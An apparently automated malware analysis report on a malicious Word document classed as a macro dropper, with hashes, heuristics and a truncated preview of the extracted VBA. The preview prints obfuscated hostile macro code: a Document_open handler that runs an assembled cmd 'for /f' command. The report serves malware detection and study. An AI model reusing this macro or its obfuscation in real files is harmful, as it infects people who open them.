Office (OLE) malware analysis — malicious · e401b72ed7d43a35

MALICIOUS

Office (OLE)

280.0 KB Created: 2018-07-16 00:44:00 Authoring application: Microsoft Office Word First seen: 2018-07-23

MD5: 5c6e87e007d408c00473d0bf7b15d839 SHA-1: 9b65e1dadbacceb52230f1f272ddfe6a2acefd71 SHA-256: e401b72ed7d43a35792a15dbc253ff9b037923f80bdcd166afac8fa3b32fed70

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the Document_open event and utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV detection and heuristic firings strongly suggest this is a dropper malware designed to download and execute a secondary payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6611979-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6611979-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 59485 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	59485 bytes
SHA-256: `d5cc17ba25d97d515227f8a701cfb4ecd2b5432dbe3cdf0bad0b9840ceed421b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "kjaMLZDqvI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function aFqlScTGlMKCMV() Zzavkv = (JIcaj / JhZrS + CVQioT + qupLHC / (95917 / zBJnVJ - uDBfia + CrCOAH)) lvCmw = (wusJFW / vbZtf + QLiIhI + ztEMD / (34571 / ORzzvE - wnodLT + FBiKVE)) rqQOR = (rqjiK / YvCZc + uhbvd + FotIR / (44280 / kiGFz - MiGNz + jRthq)) ppicqn = (EBdCn / EiuzTi + AzowOw + vvnEr / (77974 / kDSQhR - pBpAwz + jfjmDJ)) QmbJF = (UzVXl / LjQEwf + aNhIo + trzJs / (4822 / PokXLM - UaGjH + jkVbwS)) pvjdmI = (aXndV / iXvssj + uAGBBv + JWVKa / (64909 / ZsBtYE - uCSDmz + NaiFi)) BkNsUH = (OYKzw / bbilN + LwwzPw + MQESo / (58940 / sCiDp - ijnRpz + cHDAA)) End Function Function QqPCsmTAHTU() cRBBuB = (nFWdm / HCwTWX + YNavh + jjMkMP / (10982 / OzoLtQ - ZYczbq + hEnnn)) zzAWD = (tECPzS / fKpzlr + XvCzQ + qWbQd / (83626 / pMnRh - izbOb + kDGJL)) ZSJqP = (DwdFEF / rPdXn + nLwMTF + Qkqsst / (6896 / VnRjw - ZuiVcZ + GKRwq)) PrFTT = (ZaVJO / qtFKHd + ozozw + lbwIz / (49331 / LlwFjr - zBzDS + vzOcuf)) FKbuHO = (qbSYkm / EuzbQ + HnAki + KlMVN / (34669 / uFbXL - drIahf + zauUdT)) End Function Private Sub Document_open() On Error Resume Next Vffznh = (kPcLj / kiPNMX + LSLXU + ZwuiSv / (57071 / izvLq - zSiqD + CDSlMB)) KRwKvH = (XIChdo / pWpNh + LimAX + wvIjr / (95751 / DdaId - IDtTOj + ozAaNv)) hlqIub = (bMGWD / mowJb + mJafp + zoRBAj / (28250 / qMGVb - oImQt + twQJo)) RKjISc = (AnEAl / fKtrXI + EjTXN + Ponjhz / (38910 / rLkQPW - dAiwP + znmwT)) zLwff = Application.Run("zWJKsklnbQQnE", "" + DUHcsHMpjK + HChTCVP + CVar("c") + nUUYsVfJVQYiw + nizBkdwjnqu + UoOWrk + AzworpuKw + RrwOjtXiX + MOXtFaIrwG + FijivZMcniN + iuoZLPMjXP + TkCsPT + MQNLnPmzHkt + LRwdXiqC + ALjaisctV + fplpqmcAClF + LmHMU + ljOrAIYH + GJJHVH + YNPdkNp + rLjSI + jJwNj + qdrudszHcw + BuhwdSJ + fQwQTkwSVKz + kzZdEfmuN + dELBFzRjMdG + qHGQH + AInkEAGvFHw + ostAHktKAz + VPrbwwpD + NmQXNwjX + ATGFBhwn + LXHsaahdhFT) KEOhh = (jfAbzL / ZJjzuc + XwRNvS + WvBIk / (49631 / msFmS - iJNML + uiKAKs)) Klhhz = (HMXND / WGATu + BMMFW + AXqcLv / (31580 / WzwUUz - PoOnJE + EUjKnf)) End Sub Function MmBmPHKkzTNlim() MZtip = (MDuLz / UszkP + zYEQLv + jEqSP / (75494 / hDlrDw - DUwpjV + VQDvcu)) McGDOk = (BCXpL / qPjtKa + EADNY + NtwHL / (84103 / azQwdj - hzkrSw + JDjsYM)) SvNzFF = (WkfYR / QGIjRm + DIafat + omWms / (36427 / lpdFsl - wLKHDv + JvPKH)) JViXMs = (jOsfwq / QiaYBK + zQXWz + irGcl / (3906 / bUvhj - HPwRcE + asQol)) End Function Attribute VB_Name = "MEKAOkzrHQu" Function UoOWrk() On Error Resume Next hUWYj = (7254 * 15043 + 29456 * noolm - utsEw * 23646 + VXVuf + 17414 + (mwQOf + zutVhp)) dHGtQ = zwBIQ + KwzDm - 47035 + NNrYZG + 76910 + zzWWI + BsQOAP + EnuHwR / BvqjJq / Hljhn cMEqYooR = CStr(Chr(QEwswjsWBQap + zFlzHAorhvbOh + 109 + JwLYbtnoso + tmoidiPuzq)) + "d /" + CStr(Chr(zsZWARkzQCr + RozLQtJNc + 99 + sNwfRhU + iajURnb)) + " f^or " + " , , /" + "f ; ;" + " " + CStr(Chr(HqvXTMtQjizmQU + dnTFhiiYNj + 34 + fudRFSU + VtlmBzlW)) + " to" + "ken" + "s" + "= 2 d" + "e" + "li" + CStr(Chr(FlznzIwNZ + KmVokpFfjz + 109 + KIthSjkzBwOkT + dIHFvwmL)) wfmHbJ = iplJB + awQap - 952 + EJmNS + 47283 + GhhNmL + pPVrq + vMBzzp / hpSGz / NtosYo ztCcdcjLPZ = "s=g" + "HFos" + CStr(Chr(zQIfqkUFt + FbfhpKVOYkU + 34 + bWZsEwXznQVP + KLtiapcXh)) + " " + "; " + "%^" + CStr(Chr(GlRzhfcKZD + cBwRhSKK + 99 + tKCfGuPG + zTwKGzFlsEDNq)) + " , i" + "n" + " " BHYWqC = hujzWc + IoNdUM - 33294 + aPKzM + 921 + wCnPw + tZdwB + HYXwFl / jDLLi / hmhIL kKzjMH = fPPkiT + JqDRF - 23419 + USlrE + 24518 + YMRRG + Mzaqm + FXQobj / mYwdr / jfQrM uRGDw = YHEMQ + iGHnD - 58808 + Kpaqc + 66149 + LZjwF + CiEoQ + qIIHi / jRMzZ / MNCdST BdipUS = ", ( " + " , ' ;" + " " + "; FTY" + "p^" + "^E" + " , ^" + "\| ;" + " FIN" YHwbH = BKzCS + qoBCi - 85132 + wRMLAn + 68337 + LYMkNm + RAJfaF + GNzGVW / Abkbw / DLwwoY ElRcz ... (truncated)

SHA-256: d5cc17ba25d97d515227f8a701cfb4ecd2b5432dbe3cdf0bad0b9840ceed421b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "kjaMLZDqvI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function aFqlScTGlMKCMV()
   Zzavkv = (JIcaj / JhZrS + CVQioT + qupLHC / (95917 / zBJnVJ - uDBfia + CrCOAH))
   lvCmw = (wusJFW / vbZtf + QLiIhI + ztEMD / (34571 / ORzzvE - wnodLT + FBiKVE))
   rqQOR = (rqjiK / YvCZc + uhbvd + FotIR / (44280 / kiGFz - MiGNz + jRthq))
   ppicqn = (EBdCn / EiuzTi + AzowOw + vvnEr / (77974 / kDSQhR - pBpAwz + jfjmDJ))
   QmbJF = (UzVXl / LjQEwf + aNhIo + trzJs / (4822 / PokXLM - UaGjH + jkVbwS))
   pvjdmI = (aXndV / iXvssj + uAGBBv + JWVKa / (64909 / ZsBtYE - uCSDmz + NaiFi))
   BkNsUH = (OYKzw / bbilN + LwwzPw + MQESo / (58940 / sCiDp - ijnRpz + cHDAA))
End Function
Function QqPCsmTAHTU()
   cRBBuB = (nFWdm / HCwTWX + YNavh + jjMkMP / (10982 / OzoLtQ - ZYczbq + hEnnn))
   zzAWD = (tECPzS / fKpzlr + XvCzQ + qWbQd / (83626 / pMnRh - izbOb + kDGJL))
   ZSJqP = (DwdFEF / rPdXn + nLwMTF + Qkqsst / (6896 / VnRjw - ZuiVcZ + GKRwq))
   PrFTT = (ZaVJO / qtFKHd + ozozw + lbwIz / (49331 / LlwFjr - zBzDS + vzOcuf))
   FKbuHO = (qbSYkm / EuzbQ + HnAki + KlMVN / (34669 / uFbXL - drIahf + zauUdT))
End Function
Private Sub Document_open()
On Error Resume Next
   Vffznh = (kPcLj / kiPNMX + LSLXU + ZwuiSv / (57071 / izvLq - zSiqD + CDSlMB))
   KRwKvH = (XIChdo / pWpNh + LimAX + wvIjr / (95751 / DdaId - IDtTOj + ozAaNv))
   hlqIub = (bMGWD / mowJb + mJafp + zoRBAj / (28250 / qMGVb - oImQt + twQJo))
   RKjISc = (AnEAl / fKtrXI + EjTXN + Ponjhz / (38910 / rLkQPW - dAiwP + znmwT))
zLwff = Application.Run("zWJKsklnbQQnE", "" + DUHcsHMpjK + HChTCVP + CVar("c") + nUUYsVfJVQYiw + nizBkdwjnqu + UoOWrk + AzworpuKw + RrwOjtXiX + MOXtFaIrwG + FijivZMcniN + iuoZLPMjXP + TkCsPT + MQNLnPmzHkt + LRwdXiqC + ALjaisctV + fplpqmcAClF + LmHMU + ljOrAIYH + GJJHVH + YNPdkNp + rLjSI + jJwNj + qdrudszHcw + BuhwdSJ + fQwQTkwSVKz + kzZdEfmuN + dELBFzRjMdG + qHGQH + AInkEAGvFHw + ostAHktKAz + VPrbwwpD + NmQXNwjX + ATGFBhwn + LXHsaahdhFT)
   KEOhh = (jfAbzL / ZJjzuc + XwRNvS + WvBIk / (49631 / msFmS - iJNML + uiKAKs))
   Klhhz = (HMXND / WGATu + BMMFW + AXqcLv / (31580 / WzwUUz - PoOnJE + EUjKnf))
End Sub
Function MmBmPHKkzTNlim()
   MZtip = (MDuLz / UszkP + zYEQLv + jEqSP / (75494 / hDlrDw - DUwpjV + VQDvcu))
   McGDOk = (BCXpL / qPjtKa + EADNY + NtwHL / (84103 / azQwdj - hzkrSw + JDjsYM))
   SvNzFF = (WkfYR / QGIjRm + DIafat + omWms / (36427 / lpdFsl - wLKHDv + JvPKH))
   JViXMs = (jOsfwq / QiaYBK + zQXWz + irGcl / (3906 / bUvhj - HPwRcE + asQol))
End Function


Attribute VB_Name = "MEKAOkzrHQu"
Function UoOWrk()
On Error Resume Next
hUWYj = (7254 * 15043 + 29456 * noolm - utsEw * 23646 + VXVuf + 17414 + (mwQOf + zutVhp))
   dHGtQ = zwBIQ + KwzDm - 47035 + NNrYZG + 76910 + zzWWI + BsQOAP + EnuHwR / BvqjJq / Hljhn
cMEqYooR = CStr(Chr(QEwswjsWBQap + zFlzHAorhvbOh + 109 + JwLYbtnoso + tmoidiPuzq)) + "d /" + CStr(Chr(zsZWARkzQCr + RozLQtJNc + 99 + sNwfRhU + iajURnb)) + " f^or " + " , , /" + "f ; ;" + " " + CStr(Chr(HqvXTMtQjizmQU + dnTFhiiYNj + 34 + fudRFSU + VtlmBzlW)) + "   to" + "ken" + "s" + "= 2 d" + "e" + "li" + CStr(Chr(FlznzIwNZ + KmVokpFfjz + 109 + KIthSjkzBwOkT + dIHFvwmL))
wfmHbJ = iplJB + awQap - 952 + EJmNS + 47283 + GhhNmL + pPVrq + vMBzzp / hpSGz / NtosYo
ztCcdcjLPZ = "s=g" + "HFos" + CStr(Chr(zQIfqkUFt + FbfhpKVOYkU + 34 + bWZsEwXznQVP + KLtiapcXh)) + " " + "; " + "%^" + CStr(Chr(GlRzhfcKZD + cBwRhSKK + 99 + tKCfGuPG + zTwKGzFlsEDNq)) + "  , i" + "n" + " "
BHYWqC = hujzWc + IoNdUM - 33294 + aPKzM + 921 + wCnPw + tZdwB + HYXwFl / jDLLi / hmhIL
   kKzjMH = fPPkiT + JqDRF - 23419 + USlrE + 24518 + YMRRG + Mzaqm + FXQobj / mYwdr / jfQrM
   uRGDw = YHEMQ + iGHnD - 58808 + Kpaqc + 66149 + LZjwF + CiEoQ + qIIHi / jRMzZ / MNCdST
BdipUS = ", ( " + " , ' ;" + "  " + "; FTY" + "p^" + "^E" + " , ^" + "|  ;" + " FIN"
YHwbH = BKzCS + qoBCi - 85132 + wRMLAn + 68337 + LYMkNm + RAJfaF + GNzGVW / Abkbw / DLwwoY
ElRcz
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.